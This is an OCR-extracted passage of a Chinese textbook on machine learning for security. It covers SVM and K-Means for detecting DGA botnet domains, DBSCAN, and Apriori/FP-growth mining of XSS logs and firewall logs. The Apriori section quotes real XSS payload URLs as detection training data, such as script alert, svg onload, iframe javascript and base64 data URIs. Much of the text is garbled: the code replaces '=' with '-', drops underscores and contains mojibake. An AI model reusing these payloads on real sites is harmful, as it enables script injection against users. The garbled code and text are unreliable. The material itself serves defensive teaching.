
以 域名 长 度 为 横 轴 ， 平 均 jarccard 系 数 为 纵 轴 作 图 ， 结 果 如 图 9-16 所 示 。 


ta/dga-post-tovar-goz-1000.txt") 
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图 9-16 平均 jarccard 系 数 分 布 图 
分 析 图 9-16， 不 同 家 族 之 间 具 有 了 明显 聚合 效果 ， 正 常 域 名 与 DGA 之 间 具 有 一 定 的 区 分 性 。 
4.HMM 系 数 


正常 人 通常 在 取 域 名 的 时 候 ， 都 会 偏向 选取 常见 的 几 个 单词 组 合 ， 抽 象 成 数学 可 以 理解 的 语言 ， 因 此 ， 以 常见 英文 单词 训练 HMM 模 型 ， 正 常 域名 的 HMM 系 数 偏 高 ， 僵 尸 网 络 DGA 域 名 由 于 是 随机 生 
成 的 ， 所 以 HMM 系 数 偏 低 。 由 于 HM M 将 会 在 后 面 章节 专门 介绍 ， 所 以 这 里 只 是 以 统计 图 介绍 下 ， 如 图 9-17 所 示 。 


*** dga post-tovar-goz 
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图 9-17 HMM 系 数 分 布 图 


9.4.3 ”模型 验证 


得 到 特征 化 的 向 量 后 ， 可 使 用 SVM 算法 进行 验证 ， 如 图 9-18 所 示 ， 这 里 就 不 乾 述 了 。 
HMM 特征 
唯一 字母 数据 比例 
提取 特征 — 
JU E SE BE LEE Bl 


平均 jarccard 系数 
SVM 向 量 


僵尸 网 络 家 族 A QIME- EIA 





图 9-18 SVM 验证 DGA 示 意图 


9.5 本草 小 结 


本 章 介 绍 了 支持 向 量 基 的 基本 原理 ， 并 以 XSS 检 测 以 及 DGA 家 族 区 分 为 例 ， 展 示 了 SVM 的 基本 用 法 。 支 持 向 量 机 作为 机 器 学 习 算 法 领域 中 的 网 红 ， 一 直 在 众多 应 用 中 发 挥 着 重要 作用 。 
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我 写作 本 章 时 参考 了 以 下 网 站 ， 读 者 要 想 进 一 步 学 习 ， 欢 迎 到 这 些 网 站 进一步 了 解 更 多 信息 : 
: https:/ /www.teddit.com/r/MachineLearning/comments/15zrpp/please explain support vector machines svm like i/ 
: http://blog.csdn. NET/Ivhao92 /article /details/50817110 
: http://blog.csdn.net/v. july. v/atticle/details/7624837 
- http://www.freebuf.com/articles/network/114693.html 
还 有 一 些 参考 文献 值得 一 读 : 
[1] Bilge L, Kirda E, Kruegel C, Balduzzi M.Exposure: Finding MaliciousDomains Using Passive DNS Analysis.Netwotk&Distributed System Security Symposium, 2011. 
[2] J Choi, H Kim, C Choi, P Kim.Efficient Malicious Code Detection Using N-Gram Analysis and SVM.International Conference on Network-based Information Systems, 2011, 16 (1) : 618-621 


[3] B Zhang, J Yin, J Hao.Intelligent Detection Computer Viruses Based on Multiple Classifiers. Ubiquitous Intelligence and Computing, 2007. 
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K-Means 和 DBSCAN 是 我 们 介绍 的 第 一 批 无 监督 算法 ， 相 对 于 需要 人 工 标 记 的 有 监督 学 习 ， 无 监督 算法 在 数据 处 理 环节 的 工作 量 确实 少 o. 本 章 将 介绍 K-Means 算 法 和 DBSCAN 算 法 的 基本 概念 ， 并 给 


出 基本 的 使 用 方式 。 然 后 介绍 如 何 使 用 K-Means 算 法 检测 DGA 域 名 。 


10.1 K-Means 算 ;去 概述 


从 前 有 一 群 猴子 ， 过 着 简单 而 快乐 的 生活 。 有 一 天 ， 其 中 两 只 猴子 因为 小 事 争 吵 起 来 ， 最 终 一 发 不 可 收拾 ， 两 个 猴子 势 不 两 立 。 从 此 这 两 只 猴子 就 开始 拉 帮 结 派 ， 把 觉得 和 自己 合 的 来 的 拉 到 一 起 ， 于 
是 猴 群 分 裂 成 了 两 拔 。 第 一 拨 的 猴子 里 面 ， 带 头 的 猴子 统治 得 很 顺利 ， 第 二 拨 猴 子 里 面 ， 突 然 又 有 一 只 猴子 雄 起 了 ， 打 败 了 原来 的 猴 王 ( 见 图 10-1) ， 成 为 了 新 的 猴 王 ， 最 终 钦 群 的 派系 和 管理 层 都 稳定 了 
下 来 ， 划 分 成 了 两 拨 猴 子 ， 完 成 了 聚 类 。 这 其 实 就 是 个 K-Means 算 法 的 案例 。 


K-Means 算 法 是 最 为 经 典 的 基于 划分 的 聚 类 方法 ， 它 的 中 心思 想 是， 以 空间 中 k 个 点 为 中 心 进行 聚 类 ， 通 过 迭代 的 方法 ， 逐 次 更 新 各 聚 类 中 心 的 值 ， 直 至 得 到 最 好 的 聚 类 结果 。 简 单 描述 上 面 提 到 的 猴 
子 拉 帮 结伙 的 步骤 为 : 


q 


KHA, MNAE GAEE ARANT BU ARR PS; 而 对 于 所 剩 下 的 其 他 对 象 ， 则 根据 它们 与 这 些 聚 类 中 心 的 相似 度 ( 距 离 ) ， 分 别 将 它们 分 配给 与 其 最 相似 的 〈 聚 类 中 心 所 代表 的 ) 聚 类 。 
然后， 再 计算 每 个 所 获 新 聚 类 的 聚 类 中 心 〈 该 聚 类 中 所 有 对 象 的 均值 ) 。 


.不断 重 复 这 一 过 程 直到 标准 测度 函数 开始 收敛 为 止 。 


可 视 化 这 一 过 程 如 图 10-2 所 示 。 


图 10-2 K-Means# Fit Aik EA 


10.2 示例: hello world! K-Means 


我 们 先 演示 K-Means 的 基础 使 用 ， 完 整 演示 代码 请 见 本 书 GitHub 上 的 10-1.py。 


加 载 K-Means 库 : 


import numpy as np 

import matplotlib.pyplot as plt 

from sklearn.cluster import K-Means 
from sklearn.datasets import make blobs 


生成 测试 样本 : 





n samples = 1500 
random state — 170 
X, y = make blobs(n samples-n samples, random state-random state) 








y pred = KMeans (n clusters-3, random state-random state).fit predict (X) 





可 视 化 结果 如 下 ， 图 10- 3 为 实例 图 。 


lt.subplot (221) 
lt.scatter(X[:, 0], X[:, 1], c-y pred) 
t.title("hello word!") 

lt. show () 
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hello word! 





图 10-3” 开 -Means 算 法 实例 图 


10.3 示例 : 使 用 K-Means 算 法 检测 DGA 域 名 


域名 生成 算法 (Domain Generation Algorithm, DGA) 是 一 项 古老 但 一 直 活 路 的 技术 ， 是 中 心 结构 僵尸 网 络 赖 以 生存 的 关键 武器 ， 该 技术 给 打击 和 关闭 该 类 型 僵尸 网 络 造成 了 不 小 的 麻烦 ， 人 研究 人 员 
需要 快速 掌握 域名 生成 算法 和 输入 ， 对 生成 的 域名 及 时 进行 处 置 。 我 们 使 用 K-Means 算 法 进行 聚 类 ， 观 察 DGA 与 正常 域名 的 聚 类 情况 。DGA 详 细 内 容 请 阅读 第 12 章 ， 完 整 演示 代码 请 见 本 书 GitHub 上 的 
10-2.py。 


1. 数 据 搜 集 和 数据 清洗 


加 载 alexa 前 100 的 域名 作为 白 样 本 ， 标 记 为 0; 分 别 加 载 cryptolocker 和 post-tovar-goz 家 族 的 DGA 域 名 ， 分 别 标记 为 2 和 3: 








2 = load alexa ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/dga/top-100.csv") 
x2 domain list = load dga ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/OEBPS/Text/../data/dga/dga-cryptolocke-50.txt") 

X3 domain list = load dga ("http://www.hzcourse.com/resource/readBook?path-/openresources/teach ebook/uncompressed/16472/O0EBPS/Text/../data/dga/dga-post-tovar-goz-50.txt") 
x domain list=np.concatenate((xl domain list, x2 domain list,x3 domain list)) 

yl-[0]*len(x1 domain list) i i i i B B 

y2-[1]*len(x2 domain list) 
y3=[2]*len(x3 domain list) 
y=np.concatenate((yl, y2,y3)) 





xl domain lis! 
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2. 特 征 化 


特征 化 过 程 如 图 10-4 所 示 。 


baldu.com ~ 
| 





图 10-4 DGA 域 名 2-gram 处 理 
以 2-gram 分 隔 域名 ， 切 割 单元 为 字符 ， 以 整个 数据 集合 的 2-gram 结 果 作 为 词汇 表 并 进行 映射 ， 得 到 特征 化 的 向 量 : 


cv = CountVectorizer (ngram range-(2, 2), decode error-"ignore", 
token pattern-r"Nw", min df-1) 
x= cv.fit transform(x domain list).toarray() 











3. 训 练 样 本 


实例 化 K-Means 算 法 : 





model-KMeans (n clusters-2, random state-random state) 
y pred - model.fit predict (x) 





4. 效 果 验 证 


使 用 TSNE 将 高 维 向 量 降 维 ， 便 于 作 图 : 








tsne = TSNE(learning rate-100) 
x-tsne.fit transform(x) 














可 视 化 聚 类 效果 ( 见 图 10-5) ， 其 中 DGA 域 名 使 用 符号 “x ”标识 : 





for i,label in enumerate (x): 
x1,x2-x[i] 
if y pred[i] == 1: 
lt.scatter (x1l,x2,marker-'o') 





| P 
else: 

plt.scatter (x1, x2,marker='x') 
plt.show () 
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图 10-5 DGA 与 正常 域名 聚 类 效果 


10.4 DBSCAN 算 法 概述 


还 是 前 面 讲 的 这 群 猴 子 ， 这 回 不 限制 小 团体 个 数 ， 也 不 指定 初始 的 猴 王 是 哪些 ， 只 限定 最 小 的 猴 群 成 员 个 数 ， 只 要 猴子 有 能 耐 ， 可 以 召集 足够 数量 的 追随 者 ， 都 可 以 自立 为 王 。 于 是 ， 经 过 几 轮 打拼 ， 
形成 了 好 几 拨 小 猴 群 ， 每 个 猴 群 都 有 自己 的 猴 王 。 这 就 是 DBSCAN 做 聚 类 。 


具有 噪声 的 基于 密度 的 聚 类 方法 (Density-Based Spatial Clustering of Applications with Noise, DBSCAN) 是 一 个 比较 有 代表 性 的 基于 密度 的 聚 类 算法 。 与 划分 和 层次 聚 类 方法 不 同 ， 它 将 艇 定义 
为 密度 相连 的 点 的 最 大 集合 ， 能 够 把 具有 足够 高 密度 的 区 域 划分 为 艇 ， 并 可 在 噪声 的 空间 数据 库 中 发 现任 意 形状 的 聚 类 。 


与 K-Means 方 法 相 比 ，DBSCAN 不 需要 事先 知道 要 形成 的 簇 类 的 数量 ， 就 可 以 发 现任 意 形状 的 艇 类 ， 并 能 够 识别 出 噪声 点 。 


10.5 示例 : hello world! DBSCAN 


我 们 演示 DBSCAN 的 基础 使 用 ， 完 整 演示 代码 请 见 本 书 GitHub 上 的 10-3.py。 
DBSCAN 核 心 函数 为 : 


DBSCAN (eps-0.5, 

min samples-5, 
metric='euclidean', 
algorithm-'auto', 
leaf size-30, 
p=None, 

n_jobs=1) 











其 中 ， 主 要 参数 为 : 
. cps， 同 一 聚 类 集合 中 两 个 样本 的 最 大 距离 。 
: min samples, 同一 聚 类 集合 中 最 小 样本 数 。 
- algotithm ， 算 法 ， 分 为 “auto” ‘ball_tree’ 'kd tree! ‘brute’ o 
: leaf_size， 使 用 BallTree 或 者 cKDTree 算 法 时 叶子 节点 个 数 。 
n_jobs， 并 发 任务 数 。 


加 载 DBSCAN 库 : 


import numpy as np 

from sklearn.cluster import DBSCAN 

from sklearn import metrics 

from sklearn.datasets.samples generator import make blobs 
from sklearn.preprocessing import StandardScaler 

import matplotlib.pyplot as plt 























创建 测试 样本 : 


centers = [[1, 1], [-1, -1], [1, -11] 

X, labels true = make blobs(n samples-750, centers-centers, cluster std-0.4, 
random state-0) 

X = StandardScaler().fit transform(X) 























运行 DBSCAN 算 法 ，eps 设 置 为 0.3， 最 小 样本 数 为 10: 


db = DBSCAN(eps-0.3, min samples-10).fit (X) 

core samples mask = np.zeros like(db.labels , dtype-bool) 
core samples mask[db.core sample indices ] - True 

labels = db.labels | 

















设置 可 视 化 需要 的 数据 : 





colors = plt.cm.Spectral(np.linspace(0, 1, len(unique labels))) 
for k, col in zip(unique labels, colors): 

if k= =i; i 
col = 'k' 
class member mask = (labels = k) 
xy = X[clase | member 1 mask & core samples mask] 
plt. plot (xy[t, 0], xy[:, 1], 'o', markerfacecolor=col, 
markeredgecolor-'k!, markersize-14) 
xy = X[class member mask & ~core samples mask] 
































可 视 化 展现 : 








plt.plot(xy[:, 0], xy[:, 1], 'o', markerfacecolor-col, 
markeredgecolor='k', markersize=6) 











plt.show () 


结果 如 图 10-6 所 示 。 


Estimated number of clusters: 3 
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图 10-6 DBSCAN 算 法 实例 图 


10.6 ”本章 小 结 


本 章 重 点 介绍 -Means 算 法 和 DBSCAN 算 法 的 基础 知识 。 相 对 于 K-Means，DBSCAN 算 法 不 需要 设置 初始 化 点 ， 基 本 实现 了 全 自动 化 聚 类 ， 这 确实 很 方便 ， 特 征 提 取 合 理 的 话 ， 聚 类 的 结果 非常 接近 人 类 
的 认 知 。 


参考 资源 


我 写作 本 章 时 参考 了 以 下 网 站 ， 读 者 要 想 进 一 步 学 习 ， 欢 迎 到 该 网 站 进一步 了 解 更 多 信息 : http://www.freebuf.com/articles/network/114693.html. 

还 有 一 些 参考 文献 值得 一 读 : 

[1] Antonakakis M, Perdisci R, Dagon D, Lee W, Feamster N.Building a Dynamic Reputation System for DNS.Usenix Security Symposium, 2010: 273-290. 

[2] Antonakakis M, PerdisciR, Lee W, Vasiloglou N, Dagon D.Detecting Malware Domains at the Upper DNS Hierarchy. Usenix Conference on Security, 2011: 27-27. 


[B] Bilge L, Kirda E, Kruegel C, Balduzzi M.Exposure: Finding Malicious Domains Using Passive DNS Analysis. Network&Distributed System Security Symposium, 2011. 


#11 Apriori 与 FP-growth 算 法 


Aptiot 和 FP-growth 算 法 是 我 们 介绍 的 第 一 批 关 联 算法 ， 它 们 也 属于 无 监督 算法 ， 可 以 自动 从 数据 中 挖掘 出 潜在 的 关联 关系 。 尿 布 和 啤酒 的 故事 几乎 是 大 数据 科普 文章 中 出 现 效 率 最 高 的 成 功 案例 ， 本 章 
将 结合 这 个 故事 来 介绍 Aptioti 算 法 的 基本 概念 ， 及 基本 的 使 用 方式 。 然 后 介绍 FP-growth 算 法 的 基本 概念 及 其 应 用 。 


11.1 _ Apriori 算 法 概述 


关联 规则 挖掘 通常 是 无 监督 学 习 ， 通 过 分 析 数 据 集 ， 挖 掘 出 潜在 的 天 联 规则 ， 最 典型 的 一 个 例子 就 是 尿布 和 啤酒 的 故事 ( 见 图 11-1) 。 相 传 沃尔玛 的 数据 分 析 人 员 通 过 分 析 大 量 购物 清音 发现， 相当 一 
部 分 消费 者 会 同时 购买 尿布 和 啤酒 ， 结 果 他 们 把 尿布 和 啤酒 灰 然 摆 在 一 起 出 售 ， 结 果 销 量 双双 增长 。 关 联 规则 分 析 的 结果 是 客观 现象 的 体现 ， 有 的 显而易见 ， 比 如 同时 购买 三 文 鱼 和 芥末 ， 有 的 勉强 可 以 解 


释 ， 比 如 尿布 和 啤酒 ， 有 的 就 匪夷所思 ， 比 如 打火机 和 奶 酷 。 关 联 算法 中 最 著名 的 就 是 Apriori 算 法 。 


首先 介绍 三 个 基本 概念 : 支持 度 、 置 信和 度 、 频 繁 k 项 集 。 


支持 度 ，P (ANB) ， 既 有 A 又 有 B 的 概率 ， 它 表现 的 是 A 和 B 两 个 事件 相对 整个 数据 集合 同时 发 生 的 频繁 程度 ， 比 如 尿布 和 啤酒 的 支持 度 是 0.2， 表 明 有 20% 的 消费 清单 中 ， 消 费 者 同时 购买 了 尿布 和 啤 


酒 。 
SSE, P (BIA) ， 在 A 发 生 的 事件 中 同时 发 生 B 的 概率 P (AB) /P (A) ， 它 表现 的 是 在 AB 两 个 事件 的 相关 程度 ， 和 整个 数据 集合 的 大 小 没有 关系 ， 比 如 尿布 和 啤酒 的 置信 度 为 0.8， 表 明 在 同时 购买 
了 两 者 的 消费 者 中 ， 购 买 尿布 的 80% 又 购买 了 啤酒 。 





图 11-1 沃尔玛 经 典 案例 尿 不 温和 啤酒 的 故事 


需要 特别 说 明 的 是 ，P (ANB) =P (BNA) ， 但 是 P (BIA) FOP (AlB) 是 两 回 事 。 如 果 事件 A 中 包含 k 个 元 素 ， 那 么 称 这 个 事件 A。 为 k 项 集 事 件 A。 满 足 最 小 支持 度 阅 值 的 事件 称 为 频繁 k 项 集 。 


Apriori 算 法 就 是 挖 握 同时 满足 最 小 支持 度 立 值 和 最 小 置信 和 度 阅 值 的 关联 规则 。Apriori 算 法 使 用 频繁 项 集 的 先 验 知识 ， 使 用 一 种 称 为 “ 逐 层 搜索 ”的 迭代 方法 ，k 项 集 用 于 探索 (k+1) 项 集 。 首 先 ， 通 
过 扫描 事务 (交易 ) 记录 ， 找 出 所 有 的 频繁 1 项 集 ， 该 集合 记 做 L1， 然 后 利用 L1 找 频繁 2 项 集 的 集合 L2，L2 找 L3， 如 此 下 去 ， 直 到 | 不 能 再 找到 任何 频繁 k 项 集 。 最 后 再 在 所 有 的 频繁 集中 找 出 强 规则 ， 即 产生 
用 户 感 兴趣 的 关联 规则 。 其 中 ，Apriori 算 法 具有 这 样 一 条 性 质 : 任 一 频繁 项 集 的 所 有 非 空子 集 也 必须 是 频繁 的 。 因 为 假如 P (1) < 最 小 支持 度 阅 值 ， 当 有 元 素 A 添 加 到 | 中 时 ， 结 果 项 集 (Anl) 不 可 能 比 | 出 


现 次 数 更 多 ， 因 此 ANl 也 不 是 频繁 的 。 
主流 的 机 器 学 习 库 对 Apriori 支 持 很 少 ， 不 过 Apriori 的 实现 的 确 比较 简单 ， 网 上 资源 很 多 ， 建 议 看 Peter Harrington 的 《机 器 学 习 实战 》， 完 整 演示 代码 请 见 本 书 GitHub 上 的 11-1.py。 下 面 介绍 Apriori 


算法 的 基本 步骤 。 
假设 数据 库 中 存在 下 面 四 条 购物 记录 : 
- ACD 
- BCE 
- ABCE 
- BE 


扫描 数据 库 并 计数 ， 计 算 每 个 商品 对 应 的 支持 度 ， 如 图 11-2 所 示 。 


tH 
并 计数 
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根据 设置 的 支持 度 筛 选 满足 需求 的 L1， 如 图 11-3 所 示 。 


两 两 连接 ， 获 得 新 的 数据 集合 ， 并 重新 扫描 计数 。 如 图 11-4 所 示 。 
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图 11-4 Apriori 算 法 第 三 步 


如 此 循环 ， 直 到 出 现 满足 设置 的 支持 度 的 全 部 集合 出 现 。 完 整 演示 代码 请 见 本 书 GitHub 上 的 11-1.py。 


11.2 示例 : hello world! Apriori 


Apriori 实 现 后 封装 的 函数 如 下 ， 其 中 support 代 表 支 持 度 ，minConf 代 表 置 信和 度 : 


L, suppData = Apriori (myDat, support=0.5) 
rules = generateRules(L, suppData, minConf=0.5) 





B) 25% 


C) 50% 


(A, E) 25% 


(B, C) 50% 


(B, E) 75% 


(C, E) 50% 








假设 我 们 需要 从 下 列 数 据 中 挖掘 频繁 项 集 : 


mybt-[[1,3,4],[2,3,5], [1, 2, 3 5], [2,5] ] 


满足 的 条 件 为 支持 度 为 0.5， 置 信 度 为 0.7: 


L, suppData = apriori (myDat, 0.5) 








rules = generateRules(L, suppData, minConf=0.7) 


print 'rules:\n', rules 






































输出 结果 为 : 

frozenset([1]) --» frozenset([3]) conf: 1.0 

frozenset([5]) --» frozenset([2]) conf: 1.0 

frozenset([2]) --» frozenset([5]) conf: 1.0 

rules: 

[(frozenset([1]), frozenset([3]), 1.0), (frozenset([5]), frozenset([2]), 1.0), 
(frozenset([2]), frozenset([5]), 1.0)] 











11.3 示例 : 使 用 Apriori 算 法 挖掘 XSS 相 关 参 数 


在 安全 领域 ，Apriori 的 应 用 非常 广泛 ， 凡 是 需要 挖掘 潜在 关联 关系 的 都 可 以 尝试 使 用 ， 比 如 关联 WAF 的 accesslog 与 后 端 数据 库 的 sqllog , 
完整 演示 代码 请 见 本 书 GitHub 上 的 11-2.py。 


为 例子 ， 


我 们 从 xssed 网 站 的 样 例 以 及 WAF 的 拦截 日 志 中 提取 Xss 攻 击 日 志 作为 样本 ， 示 例 日 志 如 下 : 


= 




















type-l&city-test£$3Cscript$3Ealert228/42873/229$3C/script$3E 














faultcity=%e5%22; alert%28/42873/%29; // 





/0 1/?$220nmouseover-'prompt (42873) 'bad=%22%3E 
/0 l/api.php?op-map&map 
/0_1/api.php?op=mapémapt ype=1 &de 


我 们 目标 是 分 析出 潜在 的 关联 关系 ， 然 后 作为 SVM、KNN 等 分 类 算法 的 特征 提取 依据 之 一 。 机 器 没有 办 法 直接 识别 日 


向 量 ， 示 例 代码 如 下 : 


myDat-[] 

with open("xss-train.txt") as f: 
for line in f: 
tokens-re.spl 
myDat.append (tokens) 
f.close() 














切割 后 的 向 量 示例 如 下 : 


1/', '', 'onmouseover', 


| l/api.php', 'op', 'map', 


vt 
, 





'prompt', 
'maptype', 





pm 
n, 


it('N-[&]N2]N$3e|N$3c0|]N$3E[N$3C|N$20]N$22| «| 2] An | N CIN) IN IN" Iz [2], " , 1ine) 





142873"; d 
"1t, 'city', 


, 'bad', 
'test', 


vt vt 
, , 





我 们 以 十 分 严格 的 置信 度 来 运行 ， 试 图 找到 关联 天 系 接 近 100% 的 情况 : 


L, suppData = Apriori (myDat, 0.1) 








rules = generateRules(L, suppData, minConf-0.99) 















































有 趣 的 现象 出 现 了 : 

frozenset(['//', '1']) --» frozenset(['', 'alert']) conf: 1.0 

frozenset(['1', 'script']) --> frozenset(['', '/script']) conf: 1.0 

frozenset(['a', 'c']) --» frozenset(['', 'm']) conf: 1.0 

frozenset(['1', '/', 'script']) --> frozenset(['', '/script']) conf: 1.0 
frozenset(['1', 'alert', 'script']) --> frozenset(['', '/script']) conf: 1.0 
frozenset(['alert', '/', 'script']) --> frozenset(['', '/script']) conf: 0.997416020672 
frozenset(['1', 'alert', '/', 'script']) --» frozenset(['', '/script']) conf: 1.0 























识别 SSH 操 作 日 志 中 异常 操作 等 。 我 们 这 里 以 分 析 accesslog 


需要 逐 行将 日 志文 本 向 量化 ， 最 简单 的 方式 就 是 按照 一 定 的 分 割 符 切割 成 单词 


, 
'script', 'alert$28/42873/$29', '/script', '', ''] 


有 些 结果 容易 理解 ， 比 如 'script 和 '1、'alert 出 现 的 话 ， 会 100% 地 导致 /script'。 有 些 结果 匪夷所思 ， 比 如 'a RU C 出 现 的话 ， 会 100% 地 导致 m 。 


我 们 进一步 


L, suppData = Apriori (myDat, 0.001) 








rules = generateRules(L, suppData, minConf-0.99) 


这 个 学 习 过 程 会 比较 慢 ， 我 们 选取 了 部 分 结果 : 










































































frozenset(['version']) --> frozenset(['', 'base64', 'OFEBF34CAA2EBF825F60025D6C0576F2', 'signMsg', 'text/html' 
frozenset(['signMsg']) --» frozenset(['', 'object', 'OFEBF34CAA2EBF825F60025D6C0576F2', 'version', 'text/html' 
frozenset (['OFEBF34CAA2EBF825F60025D6C0576F2']) --> frozenset(['', 'object', 'signMsg', 'text/html', 'base64', 





我 们 通过 关联 挖掘 识别 一 种 潜在 的 关联 关系 : object base64" data" text/html', 


通过 分 析 20 万 条 XSS 攻 击 样本 数据 ， 完 全 通过 机 器 学 习 的 方式 挖掘 潜在 的 关联 关系 ， 得 到 的 结果 举例 如 下 。 


'object"base64"data"text/html' 对 应 举例 : 


pe 


/0/252/admin/receive.php?signMsg=0FE 














BF34C4A2F] 














alert script 1 对 应 举例 : 


/0/252/include/dialog/select media.php?adminDirHand-222/$3E$3C/script$3E$3Cscript$3Ealert (1) ; $3C/script$3E 





script prompt 对 应 举例 : 


/0 1/?callback-$3Cscript$3Eprompt (42873) $3C/script$3l 





script svg onload alert 对 应 举例 : 























Lu 


, 


, 


BF825F60025D6C0576F2&version-$3Cobject$20data-data:text/html;base64, PHNjcmlwdD5hbGVydCg0Mj g3Myk8L3Nj cmlwdD4-$3E 


降低 门槛 ， 将 支持 度 也 下 降 到 0.001， 这 意味 着 即使 对 应 的 关联 关系 出 现 的 概率 只 有 干 分 之 一 ， 只 要 它 对 应 的 是 强 关 联 ， 置 信和 度 超过 0.99， 我 们 也 认为 这 是 一 种 有 价值 的 关联 : 

















'object', 'PHNjemlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4', 'data']) cc 
'base64', 'PHNjemlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4', 'data']) cc 
'PHNjemlwdD5hbGVydaCgOMjg3Myk8L3NjcmlwdD4', 'version', 'data']) cc 











/commonDetail.asp?infotype=1"'></textarea></script><svg onload-alert *43873°>&id=461 


textarea autofocus onfocus alert 对 应 举例 : 








/index.php?siteid-1&a-sg"'»«/textarea»«/script»«textarea autofocus onfocus-alert (2014) >&nszixunid=291ém=nszixun 


src javascript iframe 对 应 举例 : 


/$22/e/?xss test$3Ciframe$20src-javascript:this [%22%5Cx61%5Cx6c%5Cx65%5Cx72%5CxX74%22] ($2242873$22) $3E 














style expression alert 对 应 举例 : 





/144/user.php?back act-http://127.0.0.1$22style-x:expression (alert (42873) ) $3E 


11.4 FP-growthgiZ BD 


FP-growth 算 法 基于 Apriori 构 建 ， 但 采用 了 高 级 的 数据 结构 减少 扫描 次 数 ， 大 大 加 快 了 算法 速度 。FP-growth 算 法 只 需要 对 数据 库 进行 两 次 扫描 ， 而 Apriori 算 法 对 于 每 个 潜在 的 频繁 项 集 都 会 扫描 数据 
集 判 定 给 定 模式 是 否 频繁 ， 因 此 FP-growth 算 法 的 速度 要 比 Apriori 算 法 快 。 


FP-growth 算 法 发 现 频繁 项 集 的 基本 过 程 如 下 : 
` 构建 FP 树 ; 
从 FP 树 中 挖掘 频繁 项 集 。 


FP-growth 算 法 将 数据 存储 在 一 种 称 为 FP 树 的 紧凑 数据 结构 中 。FP 代 表 频 繁 模式 。 一 棵 FP 树 看 上 去 与 计算 机 科学 中 的 其 他 树 结构 类 似 ， 但 是 它 通过 链接 来 连接 相似 元 素 ， 被 连 起 来 的 元 素 项 可 以 看 成 一 
个 链表 。 图 11-5 给 出 了 FP 树 的 一 个 例子 。 








图 11-5 FP 树 结构 举例 


与 搜索 树 不 同 的 是 ， 一 个 元 素 项 可 以 在 一 棵 FP 树种 出 现 多 次 。FP 树 辉 存 储 项 集 的 出 现 频 率 ， 而 每 个 项 集会 以 路 径 的 方式 存储 在 数 中 。 存 在 相似 元 素 的 集合 会 共享 树 的 一 部 分 。 只 有 当 集 合 之 间 完 全 不 同 
时 ， 树 才 会 分 又 。 树 节点 上 给 出 集合 中 的 单个 元 素 及 其 在 序列 中 的 出 现 次 数 ， 路 径 会 给 出 该 序列 的 出 现 次 数 。 相 似 项 之 间 的 链接 称 为 节点 链接 ， 用 于 快速 发 现 相似 项 的 位 置 。 


假设 数据 库 中 存在 下 面 六 条 购物 记录 : 


Df, Z, h, j> P 


IZ, y, X, W; V, Uu, t, S 


"y, f, X, Z, q, t, p 
“y, Z, X, €, q, S, t, m 


元 素 项 z 出 现 了 5 次 ， 集 合 {r，2z} 出 现 了 1 次 。 于 是 可 以 得 出 结论 : z 一 定 是 自己 本 身 或 者 和 其 他 符号 一 起 出 现 了 4) 钦 。 集 合 人 ，s，y，X, MSAK, S&€&tt, r, y, x, BHM UX, zASEHBXBISUI 
次 。 就 像 这 样 ，FP 树 的 解读 方式 是 读 取 某 个 节点 开始 到 根 节点 的 路 径 。 路 径 上 的 元 素 构 成 一 个 频繁 项 集 ， 开 始 节 点 的 值 表示 这 个 项 集 的 支持 度 。 我 们 可 以 快速 读 出 项 集 但 } 的 支持 度 为 5、 项 集 
{t，s，y，X，} 的 支持 度 为 2、 项 集 {r，y，x,，z} 的 支持 度 为 1、 项 集 {r，s，X 的 支持 度 为 1。FP 树 中 会 多 次 出 现 相同 的 元 素 项 ， 也 是 因为 同一 个 元 素 项 会 存在 于 多 条 路 径 ， 构 成 多 个 频繁 项 集 。 但 是 频繁 项 集 
的 共享 路 径 是 会 合并 的 ， 如 上 图 中 的 {t,，s, y, x, z}f0{t, r, y, x, z} 


和 之 前 一 样 ， 我 们 取 一 个 最 小 阅 值 ， 出 现 次 数 低 于 最 小 阅 值 的 元 素 项 将 被 直接 忽略 。 最 小 支持 度 设 为 3， 所 以 q 和 p 没 有 在 FP 中 出 现 如 图 11-6 所 示 。 


Header 
Table 





图 11-6 ”FP 树 构 建 过 程 


11.5 示例 : hello world! FP-growth 


FP-growth 算 法 有 大 量 的 开源 实现 ， 其 中 名 气 较 大 的 是 pyfpgrowth。 完 整 演示 代码 请 见 本 书 GitHub 上 的 11-3.py。pyfpgrowth 的 安装 非常 简单 : 














pip install pyfpgrowth 





pyfpgrowth 实 现 后 封装 的 函数 如 下 ， 其 中 support 代 表 支 持 度 ，minConf 代 表 置 信 度 : 

















patterns = pyfpgrowth.find frequent patterns (transactions, support) 
rules = pyfpgrowth.generate association rules (patterns, minConf) 














假设 我 们 需要 从 下 列 数 据 中 挖掘 频繁 项 集 ; 





transactions = [[1, 











满足 的 条 件 为 支持 度 为 2， 和 置信 和 度 为 0.7: 























patterns = pyfpgrowth.find frequent patterns (transactions, 2) 
rules = pyfpgrowth.generate association rules (patterns, 0.7) 








输出 结果 为 

(Ly. Sys (2,2; 1:0); 
(5r) (1, 2), 1.0); 
(2, 5): ((1,), 1.0), 
(4,): ((2,), 1.0)} 





11.6 示例 : 使 用 FP-growth 算 法 挖掘 疑 似 僵 己 主 机 


在 互联 网 环境 下 存在 大 量 的 僵尸 主 机 的 扫描 行为 ， 僵 户主 机 频繁 更 换 IP， 很 难 通过 IP 确 定 僵尸 主机 。 通 过 使 用 FP-growth 算 法 ,分 析 防 火 墙 的 拦截 日 志 ， 挖 气 出 浏览 器 的 user-agent 字 段 和 被 攻击 的 目 
标 URL 之 间 的 关联 关系 ， 初 步 确 定 潜在 的 僵尸 主机 。 完 整 演示 代码 请 见 本 书 GitHub 上 的 11-4.py。 


使 用 测试 数据 ， 其 中 ip 表示 攻击 源 ip ，ua 表 示 浏 览 器 的 user-agent 字 段 ，target 表 示 被 攻击 的 目标 URL: 






















































































ip-ipl,ua-ual,target-url] 
ip-ip2,ua-ual,target-urll 
ip-ip3,ua-ual,target-url] 
ip-ipl,ua-ual,target-url2 
ip-ip2,ua-ual,target-url2 
ip-ip3,ua-ual,target-url2 
ip-ip4, ua=ua2, target=url2 
ip=ip5, ua=ua3, target=url2 
ip=ip5, ua=ua6, target=url6 
ip=ip6, ua=ua3, target=url4 
ip-ip7,ua-ua4,target-url4 
ip-ip8,ua-ua5,target-url5 


逐 行 读 取 测 试 数据 文件 ， 提 取 ip、ua 和 target 字 段 ， 添 加 到 transactions 变 量 中 : 














